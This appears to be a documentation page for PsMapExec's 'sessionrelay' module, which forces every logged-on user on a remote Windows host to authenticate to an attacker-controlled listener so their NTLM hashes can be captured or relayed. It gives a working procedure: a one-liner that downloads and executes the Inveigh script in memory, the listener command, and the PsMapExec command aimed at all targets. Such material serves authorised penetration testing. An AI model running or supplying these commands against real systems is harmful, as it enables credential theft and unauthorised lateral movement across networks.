Creates a cmd.exe process as each user logon session on the remote system and connects back to a non-existent share to the host specified by -ListenerIP. This can then be used with tools such as Inveigh or Responder to capture NTLMv2 hashes, or with ntlmrelayx to relay captured hashes.
For example, assuming the below output. We can see the remote host currently has the users standarduser and srv2019-admin within existing logon sessions. PsMapExec can force each one of these users to to connect to a non-existing share on a listener and we can capture their NTLMv1 or NTLMv2 hashes.
C:\Users\SRV2019-Admin>quser
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
standarduser 1 Disc 7 04/08/2024 17:14
srv2019-admin console 2 Active none 04/08/2024 17:18- SMB
- SessionHunter (WMI)
- WMI
- WinRM
| Parameter | Value | Description |
|---|---|---|
| -ShowOutput | N/A | Displays each targets output to the console |
| -SuccessOnly | N/A | Display only successful results |
Before using the module, ensure a listener such as Inveigh or Responder is running. The below example covers usage for capturing hashes with Inveigh.
# Load Inveigh into memory
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1)
# Execute Inveigh (as admin), ensuring to specify the current systems IP address
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y -IP 10.10.10.7
# Run PsMapExec, ensuring -ListenerIP is set to the same IP address as above.
PsMapExec -Targets all -Method wmi -Module sessionrelay -ListenerIP 10.10.10.7
.png)
Execution in PsMapExec
 (1) (1).png)
Inveigh Output